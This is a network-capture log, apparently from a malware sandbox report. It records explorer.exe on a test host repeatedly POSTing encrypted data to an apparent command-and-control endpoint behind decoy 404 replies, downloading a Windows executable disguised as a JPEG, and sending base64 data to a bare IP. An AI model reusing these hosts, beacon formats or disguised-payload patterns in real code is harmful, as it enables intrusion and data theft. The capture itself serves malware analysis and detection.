Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	62361	154.144.253.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:45:54.959021091 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jqxhoujpotsnhua.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: mzxn.ru
Jul 27, 2024 07:45:54.959036112 CEST	241	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 17 e5 96 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA .[k,vuVU4lWXl#O3@Zu8}Nz]-QW&of,ay1/hQ-jEBx_:e2!#gwm(lzcpL4z
Jul 27, 2024 07:45:56.071402073 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:45:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Jul 27, 2024 07:45:56.305123091 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:45:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	62366	154.144.253.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:46:04.491275072 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://igndfrdsspnvoxyl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: mzxn.ru
Jul 27, 2024 07:46:04.491300106 CEST	310	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 01 a4 9a Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA .[k,vu+{T~`XP@1LYwTE2'A>SP~3V6.J#Lf7M-a:$n;u]<0yeKO
Jul 27, 2024 07:46:05.361193895 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:46:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	62372	154.144.253.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:46:13.620168924 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://snlibtbsitsby.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: mzxn.ru
Jul 27, 2024 07:46:13.620168924 CEST	273	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 39 bd a9 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA .[k,vu`9LZtYD1j#414jo{*7o9!;S1}3\|^AXb!CK7ENc6OwV\xx}U16
Jul 27, 2024 07:46:14.497263908 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:46:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	62379	154.144.253.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:46:23.536621094 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://srmyuatrmfavkh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: mzxn.ru
Jul 27, 2024 07:46:23.536674023 CEST	318	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 4b b4 a5 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA .[k,vuyKlTaRF\!9)f\2#+9SjUAF>U=B?G}C>bxN'!,V\|phsyJ/a+z+x
Jul 27, 2024 07:46:24.425877094 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:46:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	62385	154.144.253.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:46:33.051897049 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yepbkxlonjp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: mzxn.ru
Jul 27, 2024 07:46:33.051920891 CEST	194	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 20 bf a3 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA .[k,vu, 4zi_%H)10KhV\|#2'!FYvJ'IhD#;
Jul 27, 2024 07:46:33.946867943 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:46:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	62391	154.144.253.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:46:42.455167055 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rqsjxbmjbmnltw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: mzxn.ru
Jul 27, 2024 07:46:42.455921888 CEST	117	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 5e e6 96 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA .[k,vu`^6oZGkz )qq
Jul 27, 2024 07:46:43.349023104 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:46:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	62397	154.144.253.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:46:52.104851007 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oydnksqvapytmm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 361 Host: mzxn.ru
Jul 27, 2024 07:46:52.104901075 CEST	361	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 36 fc ee Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA .[k,vuV6mQDgjMX"uN>`$F!04Q8Dy#SgwF7J/G\|Wf-FYY/2j[@Ow/>hkF_
Jul 27, 2024 07:46:53.005621910 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:46:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62252	185.149.100.242	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:01 UTC	179	OUT	GET /wp-content/images/pic1.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: mussangroup.com
2024-07-27 05:44:02 UTC	452	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=604800 expires: Sat, 03 Aug 2024 05:44:01 GMT content-type: image/jpeg last-modified: Wed, 24 Jul 2024 11:31:45 GMT accept-ranges: bytes content-length: 11672576 date: Sat, 27 Jul 2024 05:44:01 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 2c 49 00 00 18 b2 00 00 80 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 10 bc 00 00 04 00 00 a4 34 b2 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$,I@4`
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: 49 3b 66 10 76 1d 55 48 89 e5 48 83 ec 18 48 8b 10 48 8b 48 08 48 89 d0 e8 a3 60 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 ee 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c2 cc cc 49 3b 66 10 0f 86 83 00 00 00 55 48 89 e5 48 83 ec 18 f3 0f 10 00 0f 57 c9 0f 2e c1 75 04 66 90 7b 4a 0f 2e c0 75 02 7b 33 48 89 5c 24 30 e8 cd 34 06 00 48 8b 4c 24 30 48 31 c8 48 b9 21 a6 56 6a a1 6e 75 00 48 31 c8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 b9 04 00 00 00 e8 5a 85 06 00 48 83 c4 18 5d c3 48 b8 21 a6 56 6a a1 6e 75 00 48 31 d8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 44 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 55 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: I;fvUHHHHHH`H]HD$H\$gHD$H\$I;fUHHW.uf{J.u{3H\$04HL$0H1H!VjnuH1HckRHH]ZH]H!VjnuH1HckRHH]HD$H\$DgHD$H\$U
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: e8 1b 2e 03 00 48 8d 05 0e df 65 00 bb 08 00 00 00 e8 8a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 34 03 00 e8 36 30 03 00 e8 51 2e 03 00 48 8b 44 24 30 48 8b 88 d8 00 00 00 48 89 4c 24 18 e8 db 2d 03 00 48 8d 05 d6 de 65 00 bb 08 00 00 00 e8 4a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 34 03 00 e8 f6 2f 03 00 e8 11 2e 03 00 48 8b 44 24 30 48 8b 88 e0 00 00 00 48 89 4c 24 18 e8 9b 2d 03 00 48 8d 05 9e de 65 00 bb 08 00 00 00 e8 0a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 34 03 00 e8 b6 2f 03 00 e8 d1 2d 03 00 48 8b 44 24 30 48 8b 88 e8 00 00 00 48 89 4c 24 18 e8 5b 2d 03 00 48 8d 05 66 de 65 00 bb 08 00 00 00 e8 ca 35 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 34 03 00 e8 76 2f 03 00 e8 91 2d 03 00 48 8b 44 24 30 48 8b 88 f0 00 00 00 48 89 4c 24 Data Ascii: .He6HD$D460Q.HD$0HHL$-HeJ6HD$D4/.HD$0HHL$-He6HD$D{4/-HD$0HHL$[-Hfe5HD$D;4v/-HD$0HHL$
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: 48 c1 e3 10 48 89 ce 81 e1 ff ff 07 00 48 09 cb 48 89 d9 48 c1 fb 13 48 c1 e3 03 90 90 90 66 90 48 39 da 74 05 eb 23 48 89 f0 48 8b 18 48 89 1a 48 89 c6 48 89 d8 f0 48 0f b1 0e 0f 94 c3 66 90 84 db 74 e3 48 83 c4 30 5d c3 48 89 54 24 28 48 89 74 24 18 48 89 4c 24 10 48 89 5c 24 20 66 90 e8 bb ed 02 00 48 8d 05 4a 2d 67 00 bb 2c 00 00 00 e8 2a f6 02 00 48 8b 44 24 28 0f 1f 44 00 00 e8 9b f5 02 00 48 8d 05 68 87 65 00 bb 05 00 00 00 e8 0a f6 02 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b f4 02 00 48 8d 05 ce 9e 65 00 bb 08 00 00 00 e8 ea f5 02 00 48 8b 44 24 10 0f 1f 44 00 00 e8 5b f4 02 00 48 8d 05 44 a7 65 00 bb 09 00 00 00 e8 ca f5 02 00 48 8b 44 24 20 0f 1f 44 00 00 e8 3b f5 02 00 e8 76 ef 02 00 e8 91 ed 02 00 48 8d 05 45 ca 65 00 bb 0c 00 00 00 0f 1f 44 00 Data Ascii: HHHHHHfH9t#HHHHHHftH0]HT$(Ht$HL$H\$ fHJ-g,*HD$(DHheHD$D{HeHD$D[HDeHD$ D;vHEeD
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: 24 60 0f b7 7e 52 48 0f af cf 48 c1 e8 38 48 03 4b 10 3c 05 73 03 83 c0 05 48 89 4c 24 40 88 44 24 1f 48 89 ca eb 43 8b 50 54 0f ba e2 04 72 06 31 c0 31 db eb 0f 48 8b 40 30 48 89 cb 0f 1f 00 e8 9b 46 ff ff 48 85 c0 75 06 48 83 c4 50 5d c3 74 04 48 8b 40 08 e8 65 87 02 00 0f b7 7e 52 48 8d 3c 0f 48 8d 7f f8 48 8b 0f 48 85 c9 74 09 48 89 4c 24 48 31 ff eb 36 0f b6 4b 08 0f 1f 40 00 f6 c1 04 75 16 48 8d 05 25 fa 65 00 bb 15 00 00 00 e8 ca 93 02 00 48 8b 5c 24 68 0f b6 43 08 83 e0 fb 88 43 08 48 83 c4 50 5d c3 48 ff c7 48 83 ff 08 73 a7 44 0f b6 04 0f 44 38 c0 74 09 66 90 45 84 c0 75 e6 eb b1 48 89 7c 24 20 44 0f b6 46 50 4c 0f af c7 49 8d 0c 08 48 8d 49 08 44 8b 46 54 48 89 4c 24 38 41 0f ba e0 00 73 05 4c 8b 01 eb 03 49 89 c8 48 8b 4e 30 48 8b 51 18 48 8b Data Ascii: $`~RHH8HK<sHL$@D$HCPTr11H@0HFHuHP]tH@e~RH<HHHtHL$H16K@uH%eH\$hCCHP]HHsDD8tfEuH\|$ DFPLIHIDFTHL$8AsLIHN0HQH
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: 24 68 48 8b 11 48 8d 72 ff 48 89 31 48 83 fa 01 75 0d e8 29 35 05 00 48 8b 4c 24 68 89 41 0c 48 89 cb e9 8d fe ff ff 48 83 fa 08 73 65 41 84 01 41 c6 04 11 00 48 85 d2 75 0a 4d 39 d1 74 be 4c 89 d0 eb 29 48 ff ca 48 83 fa 08 73 10 41 84 01 42 0f b6 34 0a 40 80 fe 01 74 cc eb a0 48 89 d0 b9 08 00 00 00 e8 d6 8a 05 00 49 89 d2 0f b7 57 52 4c 89 d6 4a 8d 14 12 48 8d 52 f8 48 8b 12 90 49 39 d1 75 e5 49 89 c2 ba 07 00 00 00 49 89 f1 eb b5 48 89 d0 b9 08 00 00 00 e8 a1 8a 05 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 e8 67 67 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 ce fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5f 55 48 89 e5 48 83 ec 18 0f b6 53 08 0f b6 73 09 f6 c2 08 75 02 ff ce 48 89 Data Ascii: $hHHrH1Hu)5HL$hAHHseAAHuM9tL)HHsAB4@tHIWRLJHRHI9uIIHHD$H\$HL$H\|$ ggHD$H\$HL$H\|$ I;fv_UHHSsuH
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: 00 f2 0f 10 05 47 55 70 00 f2 0f 11 02 b8 01 00 00 00 eb 2c 48 81 c4 08 02 00 00 5d c3 4c 8b 0d 7c 61 ac 00 41 ff c0 45 0f b7 c0 0f 57 c0 f2 41 0f 2a c0 f2 41 0f 11 04 c1 48 ff c0 0f 1f 40 00 48 83 f8 44 7d 1f 48 8b 0d 5b 61 ac 00 48 8d 15 6c 3d 48 00 44 0f b7 04 42 48 39 c8 72 bf 66 90 e9 4d 17 00 00 48 8b 0d 44 61 ac 00 48 8b 1d 35 61 ac 00 48 ff c3 48 8b 05 23 61 ac 00 0f 1f 00 48 39 d9 73 3b bf 01 00 00 00 48 8d 35 2f 0e 57 00 e8 6a 75 03 00 48 89 0d 13 61 ac 00 83 3d 6c 0e b5 00 00 74 13 e8 d5 46 05 00 49 89 03 48 8b 0d eb 60 ac 00 49 89 4b 08 48 89 05 e0 60 ac 00 48 89 1d e1 60 ac 00 f2 0f 10 05 d1 55 70 00 f2 0f 11 44 d8 f8 e8 66 25 ff ff 48 89 1d e7 60 ac 00 48 89 0d e8 60 ac 00 83 3d 21 0e b5 00 00 74 13 e8 8a 46 05 00 49 89 03 48 8b 15 c0 60 ac Data Ascii: GUp,H]L\|aAEWA*AH@HD}H[aHl=HDBH9rfMHDaH5aHH#aH9s;H5/WjuHa=ltFIH`IKH`H`UpDf%H`H`=!tFIH`
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: 29 d1 ff c1 d1 e1 48 8d 15 77 c9 b4 00 f0 0f b1 0a 0f 94 c1 84 c9 74 c7 90 8b 05 15 37 ac 00 89 c1 81 e1 00 00 00 80 85 c9 75 21 8d 50 01 48 8d 35 ff 36 ac 00 f0 0f b1 16 0f 94 c2 0f 1f 40 00 84 d2 74 d4 8b 15 36 e9 ad 00 eb 06 8b 15 2e e9 ad 00 89 8c 24 a4 00 00 00 89 94 24 a0 00 00 00 0f b6 74 24 26 40 84 f6 74 04 85 c9 eb 14 85 c9 0f 85 f3 08 00 00 40 84 f6 74 0d 0f 1f 44 00 00 85 c9 0f 84 d0 08 00 00 44 0f 11 bc 24 78 01 00 00 c6 84 24 88 01 00 00 00 48 c7 84 24 90 01 00 00 00 00 00 00 48 8d 05 94 09 00 00 48 89 84 24 78 01 00 00 48 8b 84 24 a8 00 00 00 48 89 84 24 80 01 00 00 0f b6 44 24 3f 88 84 24 88 01 00 00 48 8b 84 24 30 01 00 00 48 89 84 24 90 01 00 00 48 8d 84 24 78 01 00 00 48 89 04 24 e8 0f e6 04 00 45 0f 57 ff 4c 8b 35 f4 cb b4 00 65 4d 8b Data Ascii: )Hwt7u!PH56@t6.$$t$&@t@tDD$x$H$HH$xH$H$D$?$H$0H$H$xH$EWL5eM
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: df 48 8d b4 24 a0 00 00 00 bb 08 00 00 00 48 89 d0 e8 ca 0e 00 00 48 8b 84 24 30 01 00 00 48 8d 7c 24 40 48 8d 7f e0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f5 cd 04 00 48 8b 6d 00 48 c7 c3 ff ff ff ff 48 89 d9 48 89 cf 48 89 c6 45 31 c0 48 8d 44 24 40 e8 49 d2 03 00 e9 d5 00 00 00 0f 1f 40 00 83 fa 06 75 0b 31 c0 48 81 c4 20 01 00 00 5d c3 90 8b 88 90 00 00 00 89 c9 48 89 8c 24 08 01 00 00 48 8b 90 98 00 00 00 48 89 94 24 00 01 00 00 e8 8b ad 01 00 48 8d 05 23 8b 64 00 bb 0c 00 00 00 e8 fa b5 01 00 48 8b 84 24 30 01 00 00 e8 6d b5 01 00 48 8d 05 ce 55 64 00 bb 07 00 00 00 90 e8 db b5 01 00 48 8b 84 24 00 01 00 00 e8 0e b3 01 00 48 8d 05 62 df 64 00 bb 13 00 00 00 66 90 e8 bb b5 01 00 48 8b 84 24 08 01 00 00 e8 ee b2 01 00 e8 69 af 01 00 e8 84 ad 01 00 48 8d 05 Data Ascii: H$HH$0H\|$@HHl$Hl$HmHHHHE1HD$@I@u1H ]H$HH$H#dH$0mHUdH$HbdfH$iH
2024-07-27 05:44:02 UTC	16384	IN	Data Raw: eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 84 01 00 00 55 48 89 e5 48 83 ec 20 48 89 44 24 30 84 00 90 e8 21 82 fe ff 4c 89 f1 48 8b 44 24 30 48 39 48 08 0f 85 4b 01 00 00 90 e8 69 84 fe ff 0f 57 c0 31 c0 eb 06 0f 10 c1 48 89 c8 f2 0f 10 0d 2c 96 6f 00 66 0f 2e c8 0f 86 f0 00 00 00 f2 0f 11 44 24 18 48 89 44 24 10 48 8b 44 24 30 48 8b 90 90 00 00 00 48 8b 0a ff d1 84 c0 0f 85 bf 00 00 00 48 8b 4c 24 30 48 8b 91 88 00 00 00 48 8b 1a b8 00 00 01 00 ff d3 48 85 db 75 5e 48 8b 0d c4 49 b4 00 0f 1f 40 00 48 85 c9 0f 84 ce 00 00 00 48 89 c2 48 89 d3 31 d2 48 f7 f1 48 85 c0 7c 0a 0f 57 c9 f2 48 0f 2a c8 eb 18 48 89 c1 83 e0 01 48 d1 e9 48 09 c1 0f 57 c9 f2 48 0f 2a c9 f2 0f 58 c9 f2 0f 10 15 Data Ascii: I;fUHH HD$0!LHD$0H9HKiW1H,of.D$HD$HD$0HHHL$0HHHu^HI@HHH1HH\|WHHHHWHX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62253	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:07 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 9147
2024-07-27 05:44:07 UTC	9147	OUT	Data Raw: 55 68 51 68 4a 35 36 64 44 66 6d 4a 65 59 31 71 75 5a 7a 41 75 50 36 70 53 72 69 72 62 4c 4c 4c 4f 47 51 6f 30 61 53 47 33 52 30 49 62 36 57 4e 4b 32 31 71 47 70 2b 7a 64 4e 44 61 57 75 6c 34 73 6d 72 2f 2b 31 43 33 73 4c 39 35 59 6e 6d 67 7a 66 36 4d 55 75 53 78 43 31 38 32 31 31 6b 64 33 31 57 43 75 67 50 57 6e 53 52 31 4f 4b 66 41 37 61 71 37 42 4c 38 30 33 7a 52 71 6d 68 43 57 6c 41 6a 6f 36 41 59 6d 4d 58 4b 78 6f 49 43 34 66 47 76 73 36 77 46 7a 36 44 47 52 76 6e 53 70 47 7a 49 41 51 7a 56 44 4f 67 45 67 53 4b 7a 66 30 49 65 42 6a 5a 59 6d 42 4d 52 46 48 70 62 4b 64 76 37 4a 79 4e 69 33 6b 35 71 7a 38 50 41 43 6c 4e 72 43 48 6a 4a 7a 4b 55 42 38 39 61 78 38 4e 57 57 35 67 67 38 71 2b 4c 6f 6e 66 37 73 48 53 75 7a 4e 55 76 63 43 72 73 58 2f 59 6a 7a Data Ascii: UhQhJ56dDfmJeY1quZzAuP6pSrirbLLLOGQo0aSG3R0Ib6WNK21qGp+zdNDaWul4smr/+1C3sL95Ynmgzf6MUuSxC18211kd31WCugPWnSR1OKfA7aq7BL803zRqmhCWlAjo6AYmMXKxoIC4fGvs6wFz6DGRvnSpGzIAQzVDOgEgSKzf0IeBjZYmBMRFHpbKdv7JyNi3k5qz8PAClNrCHjJzKUB89ax8NWW5gg8q+Lonf7sHSuzNUvcCrsX/Yjz
2024-07-27 05:44:08 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 733 Date: Sat, 27 Jul 2024 05:44:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:08 UTC	733	IN	Data Raw: 50 6d 5a 6f 2b 2f 48 6b 53 4e 4b 35 4e 55 57 75 41 4b 69 4e 56 67 66 74 74 49 4c 6d 45 75 63 30 70 51 54 67 57 71 59 4a 34 34 75 33 35 74 51 69 67 45 52 69 59 65 6f 64 6e 59 47 72 38 34 30 54 74 34 6b 57 50 52 54 6d 51 30 56 38 50 77 42 5a 76 71 32 59 4f 49 45 6a 4f 6d 78 6a 76 43 69 4c 61 38 30 77 76 5a 6f 6d 2b 38 37 77 75 68 78 67 37 6c 34 34 67 70 59 6c 41 70 72 47 77 58 6e 74 55 31 4b 37 6d 54 48 46 36 39 2b 71 68 2f 74 34 52 41 77 72 30 37 45 61 64 33 74 38 51 33 39 2f 4b 51 2f 55 45 32 2f 5a 4a 53 47 34 6e 7a 67 59 49 63 2f 67 78 2f 33 4c 63 59 4e 47 70 54 2b 46 67 31 6c 51 45 62 65 73 6f 55 52 59 53 4f 39 65 65 61 66 71 49 54 71 2f 35 50 59 73 37 52 53 37 4f 55 4a 33 63 35 35 39 42 6a 77 57 75 4e 61 53 71 5a 2f 6b 4d 78 55 52 73 42 68 45 7a 41 47 Data Ascii: PmZo+/HkSNK5NUWuAKiNVgfttILmEuc0pQTgWqYJ44u35tQigERiYeodnYGr840Tt4kWPRTmQ0V8PwBZvq2YOIEjOmxjvCiLa80wvZom+87wuhxg7l44gpYlAprGwXntU1K7mTHF69+qh/t4RAwr07Ead3t8Q39/KQ/UE2/ZJSG4nzgYIc/gx/3LcYNGpT+Fg1lQEbesoURYSO9eeafqITq/5PYs7RS7OUJ3c559BjwWuNaSqZ/kMxURsBhEzAG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62254	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
